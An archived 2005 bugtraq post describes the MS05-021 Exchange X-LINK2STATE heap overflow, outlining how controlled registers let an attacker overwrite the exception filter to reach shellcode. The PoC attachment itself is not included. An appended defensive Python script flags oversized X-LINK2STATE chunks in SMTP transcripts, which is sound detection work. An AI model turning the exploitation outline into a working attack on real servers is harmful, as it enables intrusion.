[38445] in bugtraq
MS05-021 Microsoft Exchange X-LINK2STATE Heap Overflow PoC
daemon@ATHENA.MIT.EDU (Evgeny Pinchuk)
Tue Apr 19 15:37:38 2005
Date: Tue, 19 Apr 2005 19:46:49 +0200
Message-ID: <036997811EB7544FA56BA63A1B699B8B1A9081@APOLLO.il.corp.radware.com>
From: "Evgeny Pinchuk" <EvgenyP@Radware.com>
To: <vuln-dev@securityfocus.com>, <bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>, <appsec-research@linuxbox.org>
Vulnerability Details
=====================
The vulnerability is a heap overflow in the SvrAppendReceivedChunk function,
which is located in xlsasink.dll.
When transmitting large chunks with the X-LINK2STATE verb, it is possible to
overflow the heap and perform an arbitrary memory write in the RtlAllocateHeap
function.
77fcc663 8901   mov [ecx],eax
77fcc665 894804 mov [eax+0x4],ecx
We are controlling the ECX and EAX registers, so rewriting
lpTopLevelExceptionFilter can easily get us to our shellcode on the
heap.
Regards,
Evgeny Pinchuk
[Attachment: MS05-021-PoC.pl (application/octet-stream, base64); the attachment body is not included in this copy.]
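Added example, not the post's PoC and not Microsoft's code: a defender-side helper that scans an SMTP client transcript for X-LINK2STATE commands and flags sessions that send an oversized chunk, or that stream enough chunks for the server-side append to grow large, which is the trigger condition the vulnerability details describe. The transcript line format (`sess=<id> C: <command>`), both thresholds and the sample lines are constructed assumptions, and because the advisory gives no X-LINK2STATE argument grammar the helper simply measures whatever follows the verb.

```python
import re
from collections import defaultdict

# Thresholds are assumed values, not from the advisory; legitimate link-state
# exchanges between Exchange servers carry small chunks.
MAX_CHUNK_BYTES = 4096      # a single oversized chunk
MAX_SESSION_BYTES = 65536   # chunks are appended server-side, so the total matters too
# Assumed transcript line format:  sess=<id> C: <SMTP command>   ("S:" = server)
_LINE_RE = re.compile(r"^sess=(?P<sid>\S+)\s+C:\s*(?P<cmd>.*)$")
_VERB_RE = re.compile(r"^X-LINK2STATE\b(?P<rest>.*)$", re.IGNORECASE)

def analyze_transcript(lines):
    """Return {session_id: {chunks, max_chunk, total_bytes, alerts}} for every
    session that issued X-LINK2STATE."""
    stats = defaultdict(lambda: {"chunks": 0, "max_chunk": 0, "total_bytes": 0, "alerts": []})
    for raw in lines:
        m = _LINE_RE.match(raw.rstrip("\r\n"))
        if not m:
            continue                      # server or malformed lines are skipped
        v = _VERB_RE.match(m.group("cmd"))
        if not v:
            continue                      # ordinary SMTP verbs
        # The advisory gives no argument grammar, so everything after the verb
        # is measured as the chunk payload the client pushed.
        size = len(v.group("rest").strip().encode("utf-8"))
        s = stats[m.group("sid")]
        s["chunks"] += 1
        s["max_chunk"] = max(s["max_chunk"], size)
        s["total_bytes"] += size
        if size > MAX_CHUNK_BYTES:
            s["alerts"].append(f"oversized chunk ({size} bytes)")
    for s in stats.values():              # SvrAppendReceivedChunk accumulates chunks
        if s["total_bytes"] > MAX_SESSION_BYTES:
            s["alerts"].append(f"cumulative {s['total_bytes']} bytes across {s['chunks']} chunks")
    return dict(stats)

def flagged_sessions(stats):
    """Session ids that raised at least one alert, sorted for stable output."""
    return sorted(sid for sid, s in stats.items() if s["alerts"])

# Constructed sample transcript (not a real capture).
SAMPLE_TRANSCRIPT = [
    "sess=a1 C: EHLO mx.example.test",
    "sess=a1 S: 250-mx.example.test Hello",
    "sess=a1 C: X-LINK2STATE CHUNK=" + "A" * 120,     # small chunk, no alert
    "sess=a1 C: QUIT",
    "sess=b2 C: X-LINK2STATE CHUNK=" + "A" * 20000,   # one oversized chunk
    "sess=c3 C: MAIL FROM:<user@example.test>",       # never uses the verb
] + ["sess=d4 C: X-LINK2STATE CHUNK=" + "B" * 3000 for _ in range(30)]  # many medium chunks
```

Running `flagged_sessions(analyze_transcript(SAMPLE_TRANSCRIPT))` yields `['b2', 'd4']`: b2 for a single oversized chunk, d4 for the cumulative total even though no individual chunk crosses the per-chunk threshold.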